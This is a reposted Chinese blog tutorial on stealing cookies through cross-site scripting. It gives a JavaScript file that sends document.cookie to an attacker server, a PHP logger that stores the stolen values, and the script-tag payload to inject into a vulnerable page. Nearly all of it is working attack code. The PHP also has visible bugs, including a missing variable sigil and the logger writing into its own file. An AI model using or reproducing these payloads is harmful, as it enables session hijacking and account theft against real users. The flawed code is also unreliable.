碼上快樂

相關內容    簡體    繁體

XSS獲取cookie

本文轉載自   查看原文   2016-11-19 23:50   3323 

在你服務器的html目錄下創建joke文件夾;

在joke文件夾中創建joke.js 和joke.php

 

joke.js 創建img標簽,將它的src屬性指向另一個腳本joke.php,這里關鍵的一點是:將頁面的cookie作為參數附加到url后面

joke.js代碼如下:

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://ip/joke/joke.php?joke='+encodeURIComponent(document.cookie);

 

 

joke.php解析請求里面的joke參數(即用戶的cookie),然后保存起來

joke.php代碼如下:

<?php
    @ini_set('display_errors',1);
    $str = $_GET['joke'];
    $filePath = "joke.php";

    if(is_writable($filePath)==false){
         echo "can't write";
    }else{
          $handler = fopen(filePath, "a");
          fwrite($handler, $str);
          fclose($handler);
    }
?>

 

找到XSS漏洞后,輸入如下內容:

<script src="http://ip/joke/joke.js"></script>

#ip為你的服務器ip

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 XSS獲取cookie並利用 xss獲取cookie源碼附利用代碼 dvwa下利用xss獲取cookie並利用 Pikachu-xss漏洞之cookie獲取、釣魚攻擊和xss獲取鍵盤記錄 Web安全之利用XSS漏洞進行cookie獲取 dvwa下利用xss獲取cookie並利用(繞過驗證) 【web安全】第一彈:利用xss注入獲取cookie XSS劫持cookie登錄 XSS攻擊之竊取Cookie pikachu練習平台(XSS-漏洞測試案例(cookie的竊取和利用、釣魚攻擊、XSS獲取鍵盤記錄))
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM